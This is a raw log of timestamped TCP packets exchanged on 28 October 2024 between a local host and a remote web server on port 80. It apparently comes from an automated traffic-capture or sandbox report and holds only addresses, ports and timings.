                                                                                                                                                              Oct 28, 2024 19:46:20.978039026 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.978044987 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.978071928 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.978106022 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.978127003 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.978140116 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.978173018 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.978189945 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.978208065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.978240967 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.978264093 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.978276014 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.978310108 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.978327990 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.978344917 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.978379011 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.978399038 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.978411913 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.978446960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.978468895 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.979011059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.979047060 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.979067087 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.979079962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.979114056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.979135036 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.979147911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.979182005 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.979201078 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.979216099 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.979249954 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.979264975 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.979285002 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.979331017 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.979336977 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.979368925 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.979403973 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.979415894 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.979439020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.979496956 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.979787111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.979840040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.979872942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.979892969 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.979907036 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.979940891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.979958057 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.979974985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.980007887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.980029106 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.980041027 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.980073929 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.980108023 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.980113983 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.980140924 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.980159998 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.980174065 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.980207920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.980228901 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.980490923 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.980525970 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.980541945 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.980560064 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.980595112 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.980607033 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.980648041 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.980680943 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.980700016 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.980715036 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.980750084 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.980767012 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.980783939 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.980817080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.980839014 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.980850935 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.980885029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.980897903 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.980926037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.980962038 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.980979919 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.980994940 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.981029987 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.981044054 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.981064081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.981102943 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.981115103 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.981564999 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.981616020 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.981638908 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.981650114 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.981683016 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.981705904 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.981714010 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.981749058 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.981775045 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.981781006 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.981815100 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.981826067 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.981848955 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.981882095 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.981892109 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.981915951 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.981950998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.981973886 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.981983900 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.982017040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.982028961 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.982049942 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.982084036 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.982116938 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.982116938 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.982151031 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.982167959 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:20.982383013 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.982417107 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:20.982428074 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.037121058 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.186069965 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.191597939 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.191720963 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.191817045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.191821098 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.191854000 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.191889048 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.191903114 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.191925049 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.191971064 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.191977024 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192013025 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192047119 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192058086 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.192122936 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192157030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192168951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.192192078 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192226887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192235947 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.192342997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192375898 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192397118 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.192413092 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192459106 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.192820072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192854881 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192888975 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192903042 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.192956924 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.192989111 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193006992 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.193023920 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193059921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193068981 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.193176985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193209887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193223953 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.193244934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193289995 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.193711996 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193746090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193780899 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193790913 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.193815947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193850040 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193861961 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.193883896 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.193929911 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.194066048 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.194098949 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.194133997 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.194144964 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.194169998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.194212914 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.194526911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.194581032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.194614887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.194628954 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.194756985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.194789886 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.194804907 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.194824934 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.194859982 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.194870949 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.195012093 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195044994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195060968 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.195079088 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195120096 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.195411921 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195501089 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195537090 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195547104 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.195640087 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195672035 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195683956 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.195705891 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195739985 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195746899 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.195877075 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195909023 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195919991 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.195944071 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.195995092 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.196321964 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.196377039 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.196423054 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.196475983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.196543932 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.196577072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.196588039 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.196700096 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.196732998 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.196747065 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.196768045 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.196800947 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.196819067 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.196988106 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.197021008 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.197033882 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.197057009 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.197288990 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.282704115 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.288326979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.288362980 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.288419962 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.288454056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.288459063 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.288487911 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.288501978 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.288523912 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.288558960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.288568020 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.288641930 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.288692951 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.288693905 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.288729906 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.288772106 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.288794994 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.288830042 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.288863897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.288876057 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.289015055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.289047956 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.289069891 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.289081097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.289127111 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.289133072 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.289410114 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.289460897 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.289465904 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.289495945 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.289529085 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.289535999 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.289563894 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.289597034 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.289612055 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.289632082 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.289665937 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.289671898 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.289731979 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.289778948 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.289784908 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.289819002 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.289860964 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.289911032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.289943933 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.289977074 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.289992094 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.290014029 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.290059090 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.290193081 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.290225983 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.290261030 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.290273905 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.290317059 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.290349960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.290361881 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.290384054 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.290420055 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.290427923 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.290541887 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.290591002 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.290652037 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.290685892 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.290719032 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.290738106 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.290754080 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.290797949 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.290805101 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.290842056 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.290875912 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.290884972 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.290946960 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.290994883 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.291011095 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.291049004 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.291083097 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.291104078 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.291116953 CET8049726166.1.160.211192.168.2.16
                                                                                                                                                              Oct 28, 2024 19:46:21.291162968 CET4972680192.168.2.16166.1.160.211
                                                                                                                                                              Oct 28, 2024 19:46:21.291418076 CET8049726166.1.160.211192.168.2.16
